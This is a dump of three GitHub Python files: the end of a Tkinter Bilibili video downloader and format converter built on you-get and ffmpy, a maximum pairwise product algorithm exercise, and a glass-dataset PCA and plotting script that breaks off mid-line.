sink_file = entry4.get() + '/' + name + \".\" + layout.get()\r\n listbox1.insert('end', '转换中........')\r\n try:\r\n ff = ffmpy.FFmpeg(\r\n inputs={source_file: None},\r\n outputs={sink_file: None})\r\n ff.run()\r\n window.update()\r\n listbox1.insert('end', \"转换成功\")\r\n window.update()\r\n except Exception as e:\r\n listbox1.insert('end', e)\r\n listbox1.insert('end', \"转换失败\")\r\n\r\n def select_way():\r\n waypath_ = askopenfilename()\r\n entry3.insert('0', waypath_)\r\n\r\n def selection_address():\r\n if len(entry4.get()) == 0:\r\n path_ = askdirectory()\r\n entry4.insert(\"0\", path_)\r\n else:\r\n if not os.path.exists(entry4.get()):\r\n os.mkdir(entry4.get())\r\n\r\n def select_address():\r\n if len(entry2.get()) == 0:\r\n path_ = askdirectory()\r\n window.update()\r\n time.sleep(5)\r\n entry2.insert('end', path_)\r\n listbox.delete('0', 'end')\r\n else:\r\n if not os.path.exists(entry2.get()):\r\n os.mkdir(entry2.get())\r\n path_ = entry2.get()\r\n window.update()\r\n time.sleep(5)\r\n entry2.insert('end', path_)\r\n listbox.delete('0', 'end')\r\n try:\r\n listbox.delete(\"0\", 'end')\r\n listbox.insert('0', '正在获取视频信息')\r\n cmd0 = f'you-get -i {entry1.get()}'\r\n window.update()\r\n p = sub.Popen(cmd0, stdin=sub.PIPE, stdout=sub.PIPE, stderr=sub.PIPE, shell=True)\r\n for line in iter(p.stdout.readline, b''):\r\n listbox.insert('end', line.decode('UTF-8'))\r\n if not sub.Popen.poll(p) is None:\r\n if line == \"\":\r\n break\r\n p.stdout.close()\r\n window.update()\r\n except Exception as e:\r\n listbox.insert(\"end\", \"错误提示:\")\r\n listbox.insert('end', e)\r\n listbox.insert(\"end\", \"获取信息失败\")\r\n\r\n def select_address1():\r\n if len(entry6.get()) == 0:\r\n path_ = askdirectory()\r\n window.update()\r\n entry6.insert('end', path_)\r\n listbox2.delete('0', 'end')\r\n listbox2.insert('0', '开始获取视频信息')\r\n else:\r\n if not os.path.exists(entry6.get()):\r\n os.mkdir(entry6.get())\r\n path_ = entry6.get()\r\n window.update()\r\n entry6.insert('end', path_)\r\n listbox2.delete('0', 'end')\r\n listbox2.insert('0', '正在获取视频信息')\r\n try:\r\n window.update()\r\n window.update()\r\n cmd1 = f'you-get -i --playlist {entry5.get()}'\r\n window.update()\r\n p = sub.Popen(cmd1, stdin=sub.PIPE, stdout=sub.PIPE, stderr=sub.PIPE, shell=True)\r\n for line in iter(p.stdout.readline, b''):\r\n listbox2.insert('end', line.decode('UTF-8'))\r\n if not sub.Popen.poll(p) is None:\r\n if line == \"\":\r\n break\r\n p.stdout.close()\r\n listbox2.insert('end', '获取结束')\r\n window.update()\r\n window.update()\r\n except Exception as e:\r\n listbox2.insert(\"end\", \"错误提示:\")\r\n listbox2.insert('end', e)\r\n listbox2.insert(\"end\", \"获取信息失败\")\r\n\r\n def download():\r\n window.update()\r\n listbox.delete('0', 'end')\r\n listbox.insert('0', \"开始下载\")\r\n try:\r\n window.update()\r\n urls = entry1.get()\r\n dirctory = entry2.get()\r\n difinition = select_download.get()\r\n difinit = '--format=' + difinition\r\n window.update()\r\n window.update()\r\n listbox.insert(\"end\", \"正在下载..........\")\r\n cmd2 = f'you-get -o {dirctory} {difinit} {urls}'\r\n window.update()\r\n p = sub.Popen(cmd2, stdin=sub.PIPE, stdout=sub.PIPE, stderr=sub.PIPE, shell=True)\r\n for line in iter(p.stdout.readline, b''):\r\n listbox.insert('end', line.decode('UTF-8'))\r\n if not sub.Popen.poll(p) is None:\r\n if line == \"\":\r\n break\r\n p.stdout.close()\r\n window.update()\r\n listbox.insert('end', \"下载成功\")\r\n except Exception as e:\r\n listbox.insert(\"end\", \"错误提醒:\")\r\n listbox.insert('end', e)\r\n listbox.insert('end', '下载失败')\r\n\r\n def download1():\r\n window.update()\r\n listbox2.delete('0', 'end')\r\n listbox2.insert('0', \"开始下载\")\r\n window.update()\r\n urls = entry5.get()\r\n dirctory1 = entry6.get()\r\n difinition1 = select_download1.get()\r\n difinit1 = '--format=' + difinition1\r\n window.update()\r\n try:\r\n window.update()\r\n listbox2.insert(\"end\", \"正在下载..........\")\r\n window.update()\r\n cmd3 = f'you-get -o {dirctory1} --playlist {difinit1} {urls}'\r\n window.update()\r\n p = sub.Popen(cmd3, stdin=sub.PIPE, stdout=sub.PIPE, stderr=sub.PIPE, shell=True)\r\n for line in iter(p.stdout.readline, b''):\r\n listbox2.insert('end', line.decode('UTF-8'))\r\n if not sub.Popen.poll(p) is None:\r\n if line == \"\":\r\n break\r\n p.stdout.close()\r\n listbox2.insert('end', \"下载成功\")\r\n except Exception as e:\r\n listbox2.insert(\"end\", \"错误提醒:\")\r\n listbox2.insert('end', e)\r\n listbox2.insert('end', '下载失败')\r\n\r\n def state():\r\n button1.config(state='normal')\r\n\r\n def clear0():\r\n entry1.delete(0, 'end')\r\n\r\n def clear1():\r\n entry2.delete(0, 'end')\r\n\r\n def clear2():\r\n entry5.delete(0, 'end')\r\n\r\n def clear3():\r\n entry6.delete(0, 'end')\r\n\r\n def clear4():\r\n entry3.delete(0, 'end')\r\n\r\n def clear5():\r\n entry4.delete(0, 'end')\r\n\r\n label1 = ttk.Label(frame3, text=\"\\t下载网址:\", font=(\"华文行楷\", 13), foreground='black', anchor='e',\r\n justify='right', takefocus=True)\r\n url = tk.StringVar()\r\n entry1 = ttk.Entry(frame3, textvariable=url, font=(\"华文新魏\", 13, 'bold'), foreground='black',\r\n takefocus=True,\r\n width=36)\r\n button1 = ttk.Button(frame4, text=\"确认下载\", state='disabled', command=lambda: thread_it(download))\r\n label2 = ttk.Label(frame3, text=\" 选择下载地址:\", font=(\"华文行楷\", 13), foreground=\"black\",\r\n anchor=\"e\", justify='right')\r\n address = tk.StringVar()\r\n entry2 = ttk.Entry(frame3, textvariable=address, font=(\"华文新魏\", 13, 'bold'), width=36)\r\n button2 = ttk.Button(frame3, text=\"选 择\", command=lambda: thread_it(select_address))\r\n label3 = ttk.Label(frame3, text=\" 选择清晰度:\", font=(\"华文行楷\", 13), foreground='black',\r\n anchor='e', justify='right')\r\n select_download = tk.StringVar()\r\n style = ttk.Style()\r\n style.configure(\"TRadiobutton\", font=(\"华文新魏\", 12, 'bold'))\r\n radiobutton1 = ttk.Radiobutton(frame4, text=\"dash-flv\", value='dash-flv', variable=select_download,\r\n command=lambda: thread_it(state), takefocus=False)\r\n radiobutton2 = ttk.Radiobutton(frame4, text='dash-flv720', value='dash-flv720',\r\n variable=select_download, command=lambda: thread_it(state), takefocus=False)\r\n radiobutton3 = ttk.Radiobutton(frame4, text='dash-flv480', value='dash-flv480',\r\n variable=select_download, command=lambda: thread_it(state),\r\n takefocus=False)\r\n radiobutton4 = ttk.Radiobutton(frame4, text='dash-flv360', value='dash-flv360',\r\n variable=select_download, command=lambda: thread_it(state),\r\n takefocus=False)\r\n radiobutton5 = ttk.Radiobutton(frame4, text=\"flv\", value='flv', variable=select_download,\r\n command=lambda: thread_it(state), takefocus=False)\r\n radiobutton6 = ttk.Radiobutton(frame4, text='flv720', value='flv720', variable=select_download,\r\n command=lambda: thread_it(state), takefocus=False)\r\n radiobutton7 = ttk.Radiobutton(frame4, text='flv480', value='flv480', variable=select_download,\r\n command=lambda: thread_it(state), takefocus=False)\r\n radiobutton8 = ttk.Radiobutton(frame4, text='flv360', value='flv360', variable=select_download,\r\n command=lambda: thread_it(state), takefocus=False)\r\n but1 = ttk.Button(frame4, text=\"网址清空\", command=clear0)\r\n but2 = ttk.Button(frame4, text='地址清空', command=clear1)\r\n but3 = ttk.Button(frame4, text='退出程序', command=lambda: (window.quit))\r\n xscrollbar = tk.Scrollbar(frame5, orient='horizontal')\r\n yscrollbar = tk.Scrollbar(frame5, orient='vertical')\r\n listbox = tk.Listbox(frame5, font=(\"华文新魏\", 13, 'bold'), xscrollcommand=xscrollbar.set,\r\n yscrollcommand=yscrollbar.set, width=500, height=500)\r\n xscrollbar.config(command=listbox.xview)\r\n yscrollbar.config(command=listbox.yview)\r\n listbox.insert(\"0\", '软件说明:')\r\n listbox.insert('end', '首先输入下载网址')\r\n listbox.insert('end', \"选择视频保存路径或者输入一个路径\")\r\n listbox.insert('end', '再查看视频的清晰度')\r\n listbox.insert('end', '选择清晰度')\r\n listbox.insert('end', '选择清晰度后下载视频')\r\n listbox.insert('end', '提醒(只有选择清晰度后下载按钮才开启正常状态)')\r\n\r\n label1.grid(row=0, column=0, padx=10, pady=5)\r\n entry1.grid(row=0, column=1, padx=10, pady=5)\r\n button1.grid(row=2, column=2, padx=10, pady=5)\r\n label2.grid(row=1, column=0, padx=10, pady=5)\r\n entry2.grid(row=1, column=1, padx=10, pady=5)\r\n button2.grid(row=1, column=2, padx=10, pady=5)\r\n label3.grid(row=2, column=0, sticky='w', padx=10, pady=5)\r\n radiobutton1.grid(row=0, column=0, padx=25, pady=5, sticky=\"w\")\r\n radiobutton2.grid(row=0, column=1, padx=25, pady=5, sticky=\"w\")\r\n radiobutton3.grid(row=0, column=2, padx=25, pady=5, sticky=\"e\")\r\n radiobutton4.grid(row=0, column=3, padx=25, pady=5, sticky=\"e\")\r\n radiobutton5.grid(row=1, column=0, padx=25, pady=5, sticky=\"w\")\r\n radiobutton6.grid(row=1, column=1, padx=25, pady=5, sticky=\"w\")\r\n radiobutton7.grid(row=1, column=2, padx=65, pady=5, sticky=\"e\")\r\n radiobutton8.grid(row=1, column=3, padx=65, pady=5, sticky=\"e\")\r\n but1.grid(row=2, column=0, sticky='w')\r\n but2.grid(row=2, column=1)\r\n but3.grid(row=2, column=3)\r\n xscrollbar.pack(side='bottom', fill='x', expand=True)\r\n yscrollbar.pack(side='right', fill='y', expand=True)\r\n listbox.pack(fill='both', expand=True)\r\n\r\n currentpage = frame1\r\n currentpage.pack()\r\n # 界面二\r\n frame2 = tk.Frame(window)\r\n # frame2.pack_propagate(False)\r\n frame6 = tk.Frame(frame2, relief='sunken')\r\n frame7 = tk.Frame(frame2, relief='sunken')\r\n frame8 = tk.Frame(frame2, relief='sunken')\r\n frame14 = tk.Frame(frame2, relief='sunken')\r\n # 容器分布\r\n frame6.pack()\r\n frame7.pack()\r\n frame14.pack()\r\n frame8.pack()\r\n # 控件\r\n label4 = ttk.Label(frame6, text=\"视频路径:\", font=(\"华文行楷\", 13))\r\n way = tk.StringVar()\r\n entry3 = ttk.Entry(frame6, textvariable=way, font=(\"华文新魏\", 12, 'bold'), width=36, exportselection=True)\r\n style0 = ttk.Style()\r\n style0.configure(\"TButton\", font=(\"华文行楷\", 13))\r\n button3 = ttk.Button(frame6, text='选 择', command=lambda: thread_it2(select_way))\r\n label5 = ttk.Label(frame6, text=\"转换格式:\", font=(\"华文行楷\", 13))\r\n layout = tk.StringVar()\r\n style1 = ttk.Style()\r\n style1.configure(\"TRadiobutton\", font=(\"华文新魏\", 12, 'bold'))\r\n radiobutton9 = ttk.Radiobutton(frame6, text=\"mp4\", value=\"mp4\", variable=layout, takefocus=False)\r\n radiobutton10 = ttk.Radiobutton(frame6, text=\"flv\", value=\"flv\", variable=layout, takefocus=False)\r\n radiobutton11 = ttk.Radiobutton(frame6, text=\"avi\", value=\"avi\", variable=layout, takefocus=False)\r\n radiobutton12 = ttk.Radiobutton(frame6, text=\"mov\", value=\"mov\", variable=layout, takefocus=False)\r\n label6 = ttk.Label(frame7, text=\"保存地址:\", font=(\"华文行楷\", 13))\r\n saveway = tk.StringVar()\r\n entry4 = ttk.Entry(frame7, textvariable=saveway, font=(\"华文新魏\", 12, 'bold'), width=36, exportselection=True)\r\n button4 = ttk.Button(frame7, text=\"选择路径\", command=lambda: thread_it2(selection_address))\r\n button5 = ttk.Button(frame14, text='路径清空', command=lambda: thread_it2(clear4))\r\n button6 = ttk.Button(frame14, text='地址清空', command=lambda: thread_it2(clear5))\r\n button7 = ttk.Button(frame14, text=\"开始转换\", command=lambda: thread_it2(conversion))\r\n button8 = ttk.Button(frame14, text='退出程序', command=lambda: thread_it2(window.quit))\r\n xscrollbar1 = ttk.Scrollbar(frame8, orient='horizontal')\r\n yscrollbar1 = ttk.Scrollbar(frame8, orient='vertical')\r\n listbox1 = tk.Listbox(frame8, relief=\"sunken\", font=(\"华文新魏\", 12, 'bold'), takefocus=True,\r\n xscrollcommand=xscrollbar1.set, yscrollcommand=yscrollbar1.set, width=500, height=500)\r\n xscrollbar1.configure(command=listbox1.xview)\r\n yscrollbar1.configure(command=listbox1.yview)\r\n # 控件分布\r\n label4.grid(row=0, column=0, padx=10, pady=5)\r\n entry3.grid(row=0, column=1, padx=10, pady=5)\r\n button3.grid(row=0, column=2, padx=10, pady=5)\r\n label5.grid(row=1, column=0, padx=10, pady=5)\r\n radiobutton9.grid(row=2, column=0, padx=25, pady=5, sticky=\"w\")\r\n radiobutton10.grid(row=2, column=1, padx=25, pady=5, sticky=\"e\")\r\n radiobutton11.grid(row=3, column=0, padx=25, pady=5, sticky=\"w\")\r\n radiobutton12.grid(row=3, column=1, padx=10, pady=5, sticky=\"e\")\r\n label6.grid(row=0, column=0, padx=10, pady=5)\r\n entry4.grid(row=0, column=1, padx=10, pady=5)\r\n button4.grid(row=0, column=2, padx=10, pady=5)\r\n button5.grid(row=0, column=0, padx=10, sticky='w')\r\n button6.grid(row=0, column=1, padx=10, sticky='w')\r\n button7.grid(row=0, column=2, padx=10)\r\n button8.grid(row=0, column=3, padx=10)\r\n xscrollbar1.pack(side='bottom', fill='x', expand=True)\r\n yscrollbar1.pack(side='right', fill='y', expand=True)\r\n listbox1.pack(fill='both', expand=True)\r\n\r\n # 界面三\r\n frame9 = tk.Frame(window)\r\n frame10 = tk.Frame(frame9, relief='sunken')\r\n frame11 = tk.Frame(frame9, relief='sunken')\r\n frame12 = tk.Frame(frame9, relief='sunken')\r\n frame13 = tk.Frame(frame9, relief='sunken')\r\n # 容器分布\r\n frame10.pack()\r\n frame11.pack()\r\n frame12.pack()\r\n frame13.pack()\r\n # 控件\r\n address1 = tk.StringVar()\r\n label7 = ttk.Label(frame10, text='下载网址:', font=(\"华文行楷\", 13), foreground='black', anchor='e')\r\n entry5 = ttk.Entry(frame10, textvariable=address1, font=(\"华文新魏\", 13, 'bold'), foreground='black', justify='left',\r\n exportselection=True, takefocus=True, width=36)\r\n label8 = ttk.Label(frame10, text=\"保存地址:\", font=(\"华文行楷\", 13), foreground='black', anchor='e')\r\n button7 = ttk.Button(frame10, text=\"选 择\", command=lambda: thread_it1(select_address1))\r\n address2 = tk.StringVar()\r\n entry6 = ttk.Entry(frame10, textvariable=address2, font=(\"华文新魏\", 13, 'bold'), foreground='black', justify='left',\r\n exportselection=True, takefocus=True, width=36)\r\n label9 = ttk.Label(frame10, text=\" 选择清晰度:\", font=(\"华文行楷\", 13), foreground='black',\r\n anchor='e', justify='right')\r\n select_download1 = tk.StringVar()\r\n style = ttk.Style()\r\n style.configure(\"TRadiobutton\", font=(\"华文新魏\", 12, 'bold'))\r\n radiobutton13 = ttk.Radiobutton(frame11, text=\"dash-flv\", value='dash-flv', variable=select_download1,\r\n takefocus=False)\r\n radiobutton14 = ttk.Radiobutton(frame11, text='dash-flv720', value='dash-flv720',\r\n variable=select_download1, takefocus=False)\r\n radiobutton15 = ttk.Radiobutton(frame11, text='dash-flv480', value='dash-flv480',\r\n variable=select_download1,\r\n takefocus=False)\r\n radiobutton16 = ttk.Radiobutton(frame11, text='dash-flv360', value='dash-flv360',\r\n variable=select_download1,\r\n takefocus=False)\r\n radiobutton17 = ttk.Radiobutton(frame11, text=\"flv\", value='flv', variable=select_download1,\r\n takefocus=False)\r\n radiobutton18 = ttk.Radiobutton(frame11, text='flv720', value='flv720', variable=select_download1,\r\n takefocus=False)\r\n radiobutton19 = ttk.Radiobutton(frame11, text='flv480', value='flv480', variable=select_download1,\r\n takefocus=False)\r\n radiobutton20 = ttk.Radiobutton(frame11, text='flv360', value='flv360', variable=select_download1,\r\n takefocus=False)\r\n\r\n button8 = ttk.Button(frame12, text='网址清空', command=lambda: thread_it1(clear2))\r\n button9 = ttk.Button(frame12, text='地址清空', command=lambda: thread_it1(clear3))\r\n button10 = ttk.Button(frame12, text=\"确认下载\", command=lambda: thread_it1(download1))\r\n button11 = ttk.Button(frame12, text=\"退出程序\", command=lambda: thread_it1(window.quit))\r\n xscrollbar = tk.Scrollbar(frame13, orient='horizontal')\r\n yscrollbar = tk.Scrollbar(frame13, orient='vertical')\r\n listbox2 = tk.Listbox(frame13, font=(\"华文新魏\", 13, 'bold'), xscrollcommand=xscrollbar.set,\r\n yscrollcommand=yscrollbar.set, width=500, height=500)\r\n xscrollbar.config(command=listbox2.xview)\r\n yscrollbar.config(command=listbox2.yview)\r\n # 控件分布\r\n label7.grid(row=0, column=0, padx=10, pady=5)\r\n entry5.grid(row=0, column=1, padx=10, pady=5)\r\n label8.grid(row=1, column=0, padx=10, pady=5)\r\n entry6.grid(row=1, column=1, padx=10, pady=5)\r\n button7.grid(row=1, column=2, padx=10, pady=5)\r\n label9.grid(row=2, column=0, sticky='w', padx=10, pady=5)\r\n radiobutton13.grid(row=0, column=0, padx=25, pady=5, sticky=\"w\")\r\n radiobutton14.grid(row=0, column=1, padx=25, pady=5, sticky=\"w\")\r\n radiobutton15.grid(row=0, column=2, padx=25, pady=5, sticky=\"e\")\r\n radiobutton16.grid(row=0, column=3, padx=25, pady=5, sticky=\"e\")\r\n radiobutton17.grid(row=1, column=0, padx=25, pady=5, sticky=\"w\")\r\n radiobutton18.grid(row=1, column=1, padx=25, pady=5, sticky=\"w\")\r\n radiobutton19.grid(row=1, column=2, padx=65, pady=5, sticky=\"e\")\r\n radiobutton20.grid(row=1, column=3, padx=65, pady=5, sticky=\"e\")\r\n button8.grid(row=0, column=0, padx=40)\r\n button9.grid(row=0, column=1, padx=40)\r\n button10.grid(row=0, column=2, padx=40)\r\n button11.grid(row=0, column=3, padx=40)\r\n xscrollbar.pack(side='bottom', fill='x', expand=True)\r\n yscrollbar.pack(side='right', fill='y', expand=True)\r\n listbox2.pack(fill='both', expand=True)\r\n\r\n\r\n# 创建窗口\r\nwindow = tk.Tk()\r\nsw = window.winfo_screenwidth()\r\nsh = window.winfo_screenheight()\r\nw = 700\r\nh = 500\r\nwindow.geometry(\"{0}x{1}+{2}+{3}\".format(w, h, int((sw - w) / 2), int((sh - h) / 2)))\r\nwindow.title(\"哔哩视频下载器\")\r\nwindow.resizable(True, True)\r\nwindow.update()\r\n\r\n\r\n# 按钮框架\r\nframe0 = tk.Frame(window, height=30, width=500)\r\nframe0.pack(side='top', fill='both', expand=1)\r\n\r\n# 界面切换按钮\r\nbtn = tk.StringVar()\r\nbtn1 = ttk.Button(frame0, text='视频下载', command=firstpage)\r\nbtn1.pack(side=\"left\")\r\n\r\nbtn2 = ttk.Button(frame0, text='批量下载', command=threepage)\r\nbtn2.pack(side='left', expand=True)\r\n\r\nbtn3 = ttk.Button(frame0, text='格式转换', command=secondpage)\r\nbtn3.pack(side='right')\r\n\r\n# 首先打开主界面\r\nif __name__ == \"__main__\":\r\n global frame1, frame2, frame9, currentpage\r\n create_frame()\r\n window.mainloop()\r\n","repo_name":"LiYou487341754/li8023family","sub_path":"哔哩视频下载器.py","file_name":"哔哩视频下载器.py","file_ext":"py","file_size_in_byte":22953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6265130153","text":"#Order of growth: O(n^2)\n#Why? Because there are two nested loops, each of which is O(n)\ndef max_pairwise_product(numbers):\n n = len(numbers)\n max_product = 0\n for first in range(n):\n for second in range(first + 1, n):\n max_product = max(max_product,\n numbers[first] * numbers[second])\n\n return max_product\n\n#Order of growth: O(n)\n#Why? Because the max function is O(n) and the remove function is O(n)\ndef my_max_pairwise_product(numbers):\n # find the largest number in numbers\n max1 = max(numbers)\n # find the next largest number in numbers \n # by removing the largest number from numbers\n numbers.remove(max1)\n max2 = max(numbers)\n return max1 * max2 \n\n\n\nif __name__ == '__main__':\n input_n = int(input())\n input_numbers = [int(x) for x in input().split()]\n print(my_max_pairwise_product(input_numbers))\n\n","repo_name":"ethanqtle/UCSD_Algorithms_1","sub_path":"week1_programming_challenges/2_maximum_pairwise_product/max_pairwise_product.py","file_name":"max_pairwise_product.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35720350556","text":" # -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 2 10:36:35 2017\n\n@author: rajaz\n\"\"\"\n\n# exercise 2.1.1\nimport os\nimport numpy as np\nimport xlrd\n\n# Load xls sheet with data\nos.chdir(\"C:\\\\Users\\\\rajaz\\\\OneDrive\\\\Documents\\\\Machine\\\\project_data\\\\\")\ndoc = xlrd.open_workbook(\".\\\\glass_data.xls\").sheet_by_index(0)\n\n# Extract attribute names (1st row, column 4 to 12)\nattributeNames = doc.row_values(0, 1, 10)\n\n# Extract class names to python list,\n# then encode with integers (dict)\nclassLabels = doc.col_values(10, 1, 214)\nclassNames = sorted(set(classLabels))\nclassDict = dict(zip(classNames, range(6)))\n\n# Extract vector y, convert to NumPy matrix and transpose\ny = np.array([classDict[value] for value in classLabels])\n\n# Preallocate memory, then extract excel data to matrix X\nX = np.mat(np.empty((213, 9)))\nfor i, col_id in enumerate(range(1, 10)):\n X[:, i] = np.mat(doc.col_values(col_id, 1, 214)).T\n\n# Compute values of N, M and C.\nN = len(y)\nM = len(attributeNames)\nC = len(classNames)\n\n# exercise 2.1.2\n\nfrom matplotlib.pyplot import figure, plot, title, legend, xlabel, ylabel, show\n\n# Data attributes to be plotted\ni = 0\nj = 1\n\n##\n# Make a simple plot of the i'th attribute against the j'th attribute\n# Notice that X is of matrix type (but it will also work with a numpy array)\n# X = np.array(X) #Try to uncomment this line\nplot(X[:, i], X[:, j], 'o')\n\n# %%\n# Make another more fancy plot that includes legend, class labels, \n# attribute names, and a title.\nf = figure()\nf.hold()\ntitle('NanoNose data')\n\nfor c in range(C):\n # select indices belonging to class c:\n class_mask = y.ravel()==c\n plot(X[class_mask,i], X[class_mask,j], 'o')\n\nlegend(classNames)\nxlabel(attributeNames[i])\nylabel(attributeNames[j])\n\n# Output result to screen\nshow()\n\n# exercise 2.1.3\n\nfrom matplotlib.pyplot import figure, plot, title, xlabel, ylabel, show\nfrom scipy.linalg import svd\n\n# Subtract mean value from data\nY = X - np.ones((N,1))*X.mean(0)\n\n# PCA by computing SVD of Y\nU,S,V = svd(Y,full_matrices=False)\n\n# Compute variance explained by principal components\nrho = (S*S) / (S*S).sum() \n\n# Plot variance explained\nfigure()\nplot(range(1,len(rho)+1),rho,'o-')\ntitle('Variance explained by principal components');\nxlabel('Principal component');\nylabel('Variance explained');\nshow()\n\n# exercise 2.1.4\n\n\nfrom matplotlib.pyplot import figure, plot, title, xlabel, ylabel, show, legend\nfrom scipy.linalg import svd\n\n# Subtract mean value from data\nY = X - np.ones((N,1))*X.mean(0)\n\n# PCA by computing SVD of Y\nU,S,V = svd(Y,full_matrices=False)\nV = V.T\n# Project the centered data onto principal component space\nZ = Y * V\n\n\n# Indices of the principal components to be plotted\ni = 0\nj = 1\n\n# Plot PCA of the data\nf = figure()\nf.hold()\ntitle('NanoNose data: PCA')\n#Z = array(Z)\nfor c in range(C):\n # select indices belonging to class c:\n class_mask = y.ravel()==c\n plot(Z[class_mask,i], Z[class_mask,j], 'o')\nlegend(classNames)\nxlabel('PC{0}'.format(i+1))\nylabel('PC{0}'.format(j+1))\n\n# Output result to screen\nshow()\n\n\nfrom scipy.linalg import svd\n\n# (requires data structures from ex. 2.2.1 and 2.2.3)\nY = X - np.ones((N,1))*X.mean(0)\nU,S,V = svd(Y,full_matrices=False)\nV=V.T\n\n\nprint(V[:,1].T)\n## Projection of water class onto the 2nd principal component.\n# Note Y is a numpy matrix, while V is a numpy array. \n\n# Either convert V to a numpy.mat and use * (matrix multiplication)\nprint((Y[y.ravel()==4,:] * np.mat(V[:,1]).T).T)\n\n# Or interpret Y as a numpy.array and use @ (matrix multiplication for np.array)\n#print( (np.asarray(Y[y.A.ravel()==4,:]) @ V[:,1]).T )\n\nfrom matplotlib.pyplot import figure, subplot, hist, hold, xlabel, ylim, show, xticks, boxplot, yticks\nimport numpy as np\n\nfigure(figsize=(8,7))\nu = np.floor(np.sqrt(M)); v = np.ceil(float(M)/u)\nfor i in range(M):\n subplot(u,v,i+1)\n hist(X[:,i])\n xlabel(attributeNames[i])\n ylim(0,N/2)\n \nshow()\n\n\nfigure(figsize=(12,10))\nhold(True)\nfor m1 in range(M):\n for m2 in range(M):\n subplot(M, M, m1*M + m2 + 1)\n for c in range(C):\n class_mask = (y==c)\n plot(np.array(X[class_mask,m2]), np.array(X[class_mask,m1]), '.')\n if m1==M-1:\n xlabel(attributeNames[m2])\n else:\n xticks([])\n if m2==0:\n ylabel(attributeNames[m1])\n else:\n yticks([])\n #ylim(0,X.max()*1.1)\n #xlim(0,X.max()*1.1)\nlegend(classNames)\n\nshow()\n\n\nboxplot(X)\nxticks(range(9),attributeNames)\nylabel('')\ntitle('Glass Data - boxplot')\nshow()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,0]\nmeasurements0 = np.asarray(L)\nmeasurements0 = np.squeeze(measurements0)\nstats.probplot(measurements0, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,1]\nmeasurements1 = np.asarray(L)\nmeasurements1 = np.squeeze(measurements1)\nstats.probplot(measurements1, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,2]\nmeasurements2 = np.asarray(L)\nmeasurements2 = np.squeeze(measurements2)\nstats.probplot(measurements2, dist=\"norm\", plot=pylab)\npylab.show()\n\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,3]\nmeasurements3 = np.asarray(L)\nmeasurements3 = np.squeeze(measurements3)\nstats.probplot(measurements3, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,4]\nmeasurements4 = np.asarray(L)\nmeasurements4 = np.squeeze(measurements4)\nstats.probplot(measurements4, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,5]\nmeasurements5 = np.asarray(L)\nmeasurements5 = np.squeeze(measurements5)\nstats.probplot(measurements5, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,6]\nmeasurements6 = np.asarray(L)\nmeasurements6 = np.squeeze(measurements6)\nstats.probplot(measurements6, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,7]\nmeasurements7 = np.asarray(L)\nmeasurements7 = np.squeeze(measurements7)\nstats.probplot(measurements7, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,8]\nmeasurements8 = np.asarray(L)\nmeasurements8 = np.squeeze(measurements8)\nstats.probplot(measurements8, dist=\"norm\", plot=pylab)\npylab.show()\n\n# VIRKER!!!!\nfigure(figsize=(14,10))\nfor c in range(C):\n subplot(2,C/2,c+1)\n class_mask = (y==c) # binary mask to extract elements of class c\n #class_mask = nonzero(y==c)[0].tolist()[0] # indices of class c\n \n boxplot(X[class_mask,:])\n title('Class: {0}'.format(classNames[c]))\n xticks(range(1,len(attributeNames)+1), [a[:7] for a in attributeNames], rotation=45)\n y_up = X.max()+(X.max()-X.min())*0.1; y_down = X.min()-(X.max()-X.min())*0.1\n ylim(y_down, y_up)\n\nshow()\nboxplot(X[class_mask,:])\n\nfrom matplotlib.pyplot import (figure, hold, subplot, plot, xlabel, ylabel, \n xticks, yticks,legend,show,imshow,colorbar)\n \nfigure(figsize=(12,10))\nhold(True)\nfor m1 in range(M):\n for m2 in range(M):\n subplot(M, M, m1*M + m2 + 1)\n for c in range(C):\n class_mask = (y==c)\n plot(np.array(X[class_mask,m2]), np.array(X[class_mask,m1]), '.')\n if m1==M-1:\n xlabel(attributeNames[m2])\n else:\n xticks([])\n if m2==0:\n ylabel(attributeNames[m1])\n else:\n yticks([])\n #ylim(0,X.max()*1.1)\n #xlim(0,X.max()*1.1)\nlegend(classNames)\n\nshow()\n\n\nfrom matplotlib.pyplot import (figure, show, hold)\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n# Indices of the variables to plot\n\nfigure()\nhold('True')\nind = [0, 1, 2]\n\ncolors = ['blue', 'green', 'red']\n\nax = f.add_subplot(111, projection='3d') #Here the mpl_toolkits is used\nfor c in range(C):\n class_mask = (y==c)\n s = ax.scatter(X[class_mask,ind[0]], X[class_mask,ind[1]], X[class_mask,ind[2]])\n\nax.view_init(30, 220)\nax.set_xlabel(attributeNames[ind[0]])\nax.set_ylabel(attributeNames[ind[1]])\nax.set_zlabel(attributeNames[ind[2]])\nshow()\n\n\nfrom scipy.stats import zscore\n\nX_standardized = zscore(X, ddof=1)\n\nfigure()\nimshow(X_standarized, interpolation='none', aspect=(4./N), cmap=cm.gray);\nxticks(range(9), attributeNames)\nxlabel('Attributes')\nylabel('Data objects')\ntitle('Fisher\\'s Iris data matrix')\ncolorbar()\n\nshow()\n\n# standard\nfigure(figsize=(12,6))\ntitle('Wine: Boxplot (standarized)')\nboxplot(zscore(X, ddof=1), attributeNames)\nxticks(range(1,M+1), attributeNames, rotation=45)\n\n\n#Some attributes, maybe if we can see some correlation. \n\n\nAttributes = [1,4,5,6]\nNumAtr = 